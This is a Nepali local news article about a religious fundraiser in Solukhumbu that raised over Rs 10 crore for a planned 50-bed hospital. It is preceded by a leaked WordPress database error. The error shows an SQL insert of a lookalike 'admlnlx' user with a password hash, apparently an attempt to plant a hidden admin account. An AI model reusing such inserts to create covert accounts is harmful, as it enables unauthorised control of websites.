WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BolzbBVdmkCG0gqQXZGbMmTdPVZFqU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:10:10', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १० चैत्र, सोलुखुम्बु । सोलुखुम्बुको थुलुङदुधकोशी गाउँपालिकामा आयोजित महायज्ञबाट १० करोड बढी आर्थिक संकलन भएको छ । चैत्र २ देखी ९ सम्म सचालन भएको महायज्ञमा १० कारोड ७७ लाख, ४२ हजार ६ सय ५८ रुपैँया संकलन भएको छ ।
थुलुङ दुधकोशिको केन्द्र मुक्लिमा ५० सैयाको अस्पताल निर्माणका लागि आयोजना गरिएको महायज्ञमा विभिन्न संघ सस्था तथा व्यक्तिहरुले आर्थिक सहयोग गरेका थिए । अव अस्पताल निर्माणका लागि कार्य अगाडि बढ्ने गाउँपालिका अध्याक्ष असिम राईले बताए ।
दुइ वर्षमा निर्माण सम्पन्न गर्ने गरि कार्य अगाडि बढ्ने र समय भन्दा अगाडि नै कार्य सम्पन गरिने उहाँको भनाई छ । एक महिना मात्र भए पनि समय भन्दा अगाडि अस्पताल निर्माण गरिसक्ने अध्यक्ष राईको दावि छ ।
महायज्ञ सम्पन्न गर्नका लागि ९३ लाख, २५ हजार, १ सय ५० रकम खर्च भएको
महायज्ञ मुल आयोजक समितिले जनाएको छ ।